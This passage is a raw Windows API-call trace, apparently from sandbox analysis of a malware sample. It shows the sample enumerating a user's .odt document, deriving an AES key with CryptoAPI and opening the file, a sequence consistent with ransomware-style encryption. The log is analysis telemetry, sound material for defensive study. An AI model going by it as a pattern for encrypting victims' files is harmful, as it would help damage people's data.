lpMsg=0x87f5c4) returned 0 [0179.978] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3772ae0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xf1b1dd60, ftLastAccessTime.dwHighDateTime=0x1d5d959, ftLastWriteTime.dwLowDateTime=0xf1b1dd60, ftLastWriteTime.dwHighDateTime=0x1d5d959, nFileSizeHigh=0x0, nFileSizeLow=0x4505, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_--jWXD.odt", cAlternateFileName="")) returned 0x90add8 [0179.979] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.979] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.980] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3772ae0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xf1b1dd60, ftLastAccessTime.dwHighDateTime=0x1d5d959, ftLastWriteTime.dwLowDateTime=0xf1b1dd60, ftLastWriteTime.dwHighDateTime=0x1d5d959, nFileSizeHigh=0x0, nFileSizeLow=0x4505, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_--jWXD.odt", cAlternateFileName="")) returned 0x90add8 [0179.980] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.980] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="--jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-jWXD.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.982] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.982] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0179.982] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.982] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.982] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.982] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.982] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.982] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.982] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.983] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3772ae0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xf1b1dd60, ftLastAccessTime.dwHighDateTime=0x1d5d959, ftLastWriteTime.dwLowDateTime=0xf1b1dd60, ftLastWriteTime.dwHighDateTime=0x1d5d959, nFileSizeHigh=0x0, nFileSizeLow=0x4505, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="_--jWXD.odt", cAlternateFileName="")) returned 0x90af58 [0179.983] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.983] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.983] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.983] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.983] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.983] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.983] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0179.983] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.983] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0179.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.984] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0179.985] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0179.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.985] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0179.985] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.985] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.985] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.985] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0179.985] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0179.985] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.985] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0179.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.986] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.986] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0179.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.986] CryptDestroyHash (hHash=0x90ae18) returned 1 [0179.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\_--jwxd.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.987] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.987] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0179.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0179.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0179.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0179.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0179.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0179.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0179.989] HeapFree (in: hHeap=0x8a0000, 